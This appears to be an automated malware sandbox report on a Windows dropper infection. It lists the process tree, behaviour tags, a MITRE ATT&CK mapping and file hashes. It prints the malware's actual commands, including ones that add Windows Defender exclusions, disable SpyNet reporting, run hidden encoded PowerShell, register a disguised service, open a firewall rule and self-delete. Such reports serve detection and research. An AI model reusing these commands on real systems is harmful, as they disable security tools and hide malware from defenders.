PID:4864

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3364

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5060

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1252

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4708

C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe
"C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5148

C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe
"C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:5212

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6140

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2456

C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe
"C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:5140

C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
"C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3936

C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe
"C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5328

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6324

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:1160

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5532

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:6336

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:3228

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:224

C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe
"C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5316

C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe
"C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe"
3⤵
PID:5308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:7048

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f
5⤵
- Kills process with taskkill
PID:5336

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:5508

C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe
"C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5408

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
- Blocklisted process makes network request
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 948
4⤵
- Program crash
PID:6436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 956
4⤵
- Program crash
PID:6656

C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe
"C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:6380

C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe
"C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5536

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:6908

C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe
"C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5548

C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe
"C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5600

C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe
"C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5648

C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe
"C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5640

C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe
C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe
4⤵
- Executes dropped EXE
PID:6192

C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe
"C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe"
3⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 460
4⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 468
4⤵
- Program crash
PID:6936

C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe
"C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5512

C:\Users\Admin\AppData\Local\Temp\7zSD6B6.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6264

C:\Users\Admin\AppData\Local\Temp\7zSE60.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5188

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:6696

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5224

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:6036

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:6408

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:3996

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:6760

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:6112

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:5684

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkGvnlPWW" /SC once /ST 00:45:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3404

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkGvnlPWW"
6⤵
PID:5952

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkGvnlPWW"
6⤵
PID:6212

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\EWdrJPC.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:944

C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe
"C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:5504

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5832

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:5224

C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe
"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jcngxsb\
4⤵
PID:6924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\obxzwabi.exe" C:\Windows\SysWOW64\jcngxsb\
4⤵
PID:7084

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\obxzwabi.exe /d\"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5012

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description jcngxsb "wifi internet conection"
4⤵
PID:6488

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jcngxsb
4⤵
PID:728

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5132

C:\Users\Admin\bkkimcju.exe
"C:\Users\Admin\bkkimcju.exe" /d"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\irrptjqb.exe" C:\Windows\SysWOW64\jcngxsb\
5⤵
PID:1296

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d\"C:\Users\Admin\bkkimcju.exe\""
5⤵
PID:756

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jcngxsb
5⤵
PID:6424

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:6548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 1220
5⤵
- Program crash
PID:6528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 1048
4⤵
- Program crash
PID:6892

C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe
"C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe"
3⤵
- Executes dropped EXE
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe
4⤵
PID:5772

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:5656

C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe
"C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 624
4⤵
- Program crash
PID:6248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 632
4⤵
- Program crash
PID:6364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 660
4⤵
- Program crash
PID:6832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 644
4⤵
- Program crash
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1224
4⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1232
4⤵
- Program crash
PID:6888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1304
4⤵
- Program crash
PID:6348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1324
4⤵
- Program crash
PID:2788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f & erase "C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe" & exit
4⤵
PID:5936

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f
5⤵
- Kills process with taskkill
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1460
4⤵
- Program crash
PID:2500

C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe
"C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 460
4⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 468
4⤵
- Program crash
PID:6444

C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe
"C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5672

C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe
"C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6400

C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe
"C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 460
4⤵
- Program crash
PID:6164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 468
4⤵
- Program crash
PID:6436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 3320
1⤵
PID:4724

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3340 -ip 3340
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 3320
1⤵
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3320 -ip 3320
1⤵
PID:2120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3320 -ip 3320
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 3320
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 3320
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3320 -ip 3320
1⤵
PID:404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3320 -ip 3320
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5532 -ip 5532
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5720 -ip 5720
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5680 -ip 5680
1⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5408 -ip 5408
1⤵
PID:6176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 5688
1⤵
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5600 -ip 5600
1⤵
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6400 -ip 6400
1⤵
PID:6764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5532 -ip 5532
1⤵
PID:6852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5688 -ip 5688
1⤵
PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5720 -ip 5720
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5680 -ip 5680
1⤵
PID:1748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5688 -ip 5688
1⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5704 -ip 5704
1⤵
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 5688
1⤵
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5208 -ip 5208
1⤵
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5688 -ip 5688
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5408 -ip 5408
1⤵
PID:6604

C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe
C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d"C:\Users\Admin\bkkimcju.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7024

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 572
2⤵
- Program crash
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 5688
1⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5408 -ip 5408
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7024 -ip 7024
1⤵
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5688 -ip 5688
1⤵
PID:6720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5308

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 5688
1⤵
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5688 -ip 5688
1⤵
PID:6712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5848

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Executes dropped EXE
PID:4428

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3320 -ip 3320
1⤵
PID:1864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3320 -ip 3320
1⤵
PID:5860

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
0e86fb9e283dbc80bcc69965d55bd261

SHA1
8dfba4823ebefadc04c245d373cf12d36a2bfbda

SHA256
7e48cc77859fc3339d8bfad705f26ffed1be309f12b98e78b544ec71955e5d19

SHA512
